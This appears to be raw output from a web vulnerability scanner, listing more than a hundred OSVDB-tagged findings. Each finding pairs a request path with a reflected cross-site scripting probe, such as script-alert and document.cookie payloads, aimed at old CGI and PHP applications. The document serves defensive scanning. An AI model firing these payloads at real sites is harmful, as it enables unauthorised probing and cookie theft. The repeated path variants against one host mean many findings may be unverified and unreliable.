- + OSVDB-2748: /index.1.html/mpcgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/ows-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgi-sys/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgi-local/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/htbin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgibin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgis/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/scripts/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgi-win/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/fcgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgi-exe/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgi-home/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgi-perl/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/scgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgi-bin-sdb/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgi-mod/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi.cgi/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/webcgi/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi-914/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi-915/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/mpcgi/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/ows-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi-sys/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi-local/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/htbin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgibin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgis/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/scripts/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi-win/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/fcgi-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi-exe/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi-home/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi-perl/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/scgi-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi-bin-sdb/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi-mod/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgi.cgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/webcgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgi-914/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgi-915/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/mpcgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/ows-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgi-sys/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgi-local/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/htbin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgibin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgis/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/scripts/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgi-win/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/fcgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgi-exe/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgi-home/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgi-perl/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/scgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgi-bin-sdb/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5031: /index.1.html/cgi-mod/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgi.cgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/webcgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgi-914/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgi-915/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/mpcgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/ows-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgi-sys/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgi-local/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/htbin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgibin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgis/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/scripts/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgi-win/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/fcgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgi-exe/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgi-home/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgi-perl/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/scgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgi-bin-sdb/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9283: /index.1.html/cgi-mod/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
- + /index.1.html/~/<script>alert('Vulnerable')</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
- + /index.1.html/~/<script>alert('Vulnerable')</script>.asp: Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
- + OSVDB-41361: /index.1.html/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>: MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9238: /index.1.html/supporter/index.php?t=updateticketlog&id=<script><script>alert('Vulnerable')</script></script>: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9238: /index.1.html/supporter/index.php?t=tickettime&id=<script><script>alert('Vulnerable')</script></script>: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9238: /index.1.html/supporter/index.php?t=ticketfiles&id=<script><script>alert('Vulnerable')</script></script>: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
- + OSVDB-2689: /index.1.html/servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>: Open Market Inc. ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/samples/search.dll?query=<script>alert(document.cookie)</script>&logic=AND: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2193: /index.1.html/phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>: phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-4297: /index.1.html/phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>: phpBB is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-11145: /index.1.html/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>: Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-11144: /index.1.html/phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>: Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>: Vignette server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to the latest version.
- + /index.1.html/node/view/666\"><script>alert(document.domain)</script>: Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5106: /index.1.html/netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/nav/cList.php?root=</script><script>alert('Vulnerable')/<script>: RaQ3 server script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>: The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>: The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>: The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-50539: /index.1.html/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>: Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-3201: /index.1.html/megabook/admin.cgi?login=<script>alert('Vulnerable')</script>: Megabook guestbook is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/mailman/listinfo/<script>alert('Vulnerable')</script>: Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-5803: /index.1.html/isapi/testisa.dll?check1=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-50552: /index.1.html/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
- + /index.1.html/index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-50553: /index.1.html/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-50553: /index.1.html/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>: myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>: myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2322: /index.1.html/gallery/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-31694: /index.1.html/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>: YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9231: /index.1.html/error/500error.jsp?et=1<script>alert('Vulnerable')</script>;: Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. http://www.cert.org/advisories/CA-2000-02.html.
